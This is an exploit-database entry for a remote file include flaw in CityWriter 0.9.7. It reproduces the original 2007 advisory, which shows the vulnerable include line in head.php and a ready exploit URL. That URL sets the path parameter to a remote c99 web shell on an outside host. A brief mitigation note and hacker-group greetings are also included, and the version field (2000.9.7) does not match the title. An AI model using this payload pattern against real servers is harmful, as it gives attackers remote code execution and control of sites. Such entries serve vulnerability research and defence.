CityWriter 0.9.7 Remote File Include

vendor:

CityWriter

by:

RoMaNcYxHaCkEr

N/A

CVSS

N/A

Remote File Include

Unknown

CWE

Product Name: CityWriter

Affected Version From: 2000.9.7

Affected Version To: 2000.9.7

Patch Exists: Unknown

Related CWE: Unknown

CPE: Unknown

Metasploit:

Other Scripts:

Platforms Tested: Unknown

2007

CityWriter 0.9.7 Remote File Include

The vulnerability exists in the 'head.php' file where the 'include' function is used without proper validation. An attacker can exploit this by providing a remote file URL in the 'path' parameter, which will be included and executed by the application. In this case, the exploit URL is 'Www.RxH.com/citywriter/head.php?path=http://www.no-hack.fr/shells/c99.txt?'

Mitigation:

To mitigate this vulnerability, the application should validate and sanitize user input before using it in the 'include' function. Additionally, the application should use a whitelist approach, allowing only specific files to be included.

Source

Exploit-DB raw data:

# Name : CityWriter 0.9.7 Remote File Include
# Download From :
http://download.hulihanapplications.com/citywriter/citywriter-0.97.zip
# Found By : RoMaNcYxHaCkEr
# Home Page : Not Yet :(
============================================================================
# Vulne Code In File head.php In Line 1:
<? include($path."topbar.php"); ?>
# Exploit :
Www.RxH.com/citywriter/head.php?path=http://www.no-hack.fr/shells/c99.txt?
============================================================================
# Greet To :
Cold Z3ro My Master (Hackteach.org)
Hack15 TeaM (V99x.com)
Sniper-Sa (Sniper-sa.com)
Tryag TeaM (Tryag.com)
Yee7 TeaM (Yee7.com)
My5ql Team
Also: Saudi Kafo , Adel Alroh , Mr-Google , Kill eye , Dr- Wolf4ever And All My Friends
# For Contact : RxH@HotMail.iT
Best Wishes

# milw0rm.com [2007-12-13]